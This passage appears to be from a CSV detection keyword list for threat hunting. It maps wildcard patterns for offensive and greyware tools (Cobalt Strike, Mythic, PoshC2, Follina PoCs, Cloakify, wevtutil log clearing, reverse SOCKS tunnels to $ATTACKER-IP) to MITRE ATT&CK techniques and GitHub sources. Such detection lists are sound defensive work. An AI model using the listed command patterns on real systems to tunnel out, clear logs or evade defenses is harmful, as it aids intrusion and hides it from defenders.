tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*Clearlogs*,signature_keyword,Antivirus Signature,Antivirus signature_keyword for hacktool clearing logs,N/A,N/A,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*,greyware_tool_keyword,powershell,Deletes contents of recycle bin,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*clem9669_wordlist_medium.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*clem9669_wordlist_small.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*-cli install github *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*-cli install github *Apollo.*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*-cli payload start *,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*click_to_exploit.docx*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/drgreenthumb93/CVE-2022-30190-follina,1,1,N/A,N/A,1,10,4,2023-04-20T20:34:05Z,2022-06-01T11:37:08Z -*clickjack_attack.html*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*clickjack_victim.html*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*clickme*exploit.html*,offensive_tool_keyword,POC,CVE-2022-30190 Follina POC,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/onecloudemoji/CVE-2022-30190,1,1,N/A,N/A,2,107,33,2022-05-31T09:35:37Z,2022-05-31T06:45:25Z -*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*client.py --server-ip * --server-port *,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*client.py*--domain*--hashes*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*ClipboardImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*clipboardinject.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*clipboardinject.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*clipboardinject.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*clipboard-monitor *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*ClipboardWindow-Inject*,offensive_tool_keyword,cobaltstrike,CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BronzeTicket/ClipboardWindow-Inject,1,1,N/A,10,10,58,11,2022-09-15T01:41:39Z,2022-09-14T15:55:06Z -*clipmon.sln*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*cloakify*,offensive_tool_keyword,cloakify,CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.,T1001 - T1003 - T1027 - T1036 - T1048 - T1052,TA0010,N/A,N/A,Data Exfiltration,https://github.com/TryCatchHCF/Cloakify,1,0,N/A,N/A,10,1440,233,2020-11-24T05:25:04Z,2016-05-07T04:52:26Z -*CloakNDaggerC2-main*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,1,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*cloc.exe --exclude-dir*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*cloud_enum-master.zip*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*cloudfail.py --target seo.com --tor*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudFilterEOP.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cloudmapper collect --account parent --profile parent*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudmapper configure discover-organization-accounts*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining create-multi-account-config-file -o accounts.yml*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining download --profile someprofile*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining scan --input-file default.json*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory ./*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cloudsploit *,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,0,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudsploit*cloudtrail*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudsploit/index.js*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudsploit/scans*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*CloudSploitSupplemental*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,1,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -*cloudtrail__csv_injection*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*clr2of8/GatherContacts*,offensive_tool_keyword,GatherContacts,A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.,T1593 - T1533 - T1087,TA0043 - TA0002,N/A,N/A,Information Gathering,https://github.com/clr2of8/GatherContacts,1,1,N/A,N/A,2,169,44,2022-08-27T13:28:08Z,2018-03-29T14:46:14Z -*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*cmd /c * --bypass-uac*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*cmd /c * --remote-impersonation*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,0,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*cmd /c *if exist *.txt echo ImHere*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*cmd /c mklink /d * HarddiskVolumeShadowCopy1*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*cmd /c whoami* bypass*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*cmd smb *-u*-p*,offensive_tool_keyword,crackmapexec,crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*cmd* wevtutil.exe cl *,greyware_tool_keyword,wevtutil,adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*cmd*echo*\pipe\*,greyware_tool_keyword,echo,Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account,T1068.003 - T1078.002,TA0004 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*cmd.exe /S /D /c* echo 123,greyware_tool_keyword,echo,Adversaries may attempt to test echo command after exploitation,T1059.001 - T1059.003,TA0002 - TA0006,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /c *echo test > C:\Users\Public\test.txt*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,0,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*cmd.exe /c chcp >&2*,greyware_tool_keyword,chcp,chcp displays the number of the active console code page,T1059 - T1027,TA0002 - TA0009,N/A,N/A,Discovery,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cmd.exe /c echo * > \\.\pipe\*,greyware_tool_keyword,echo,Named pipe impersonation,T1134.002 - T1055 - T1548.002,TA0004 - TA0003 - TA0002,N/A,N/A,Privilege Escalation,https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*cmd.exe /c rundll32.exe agressor.dll*stealth*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader 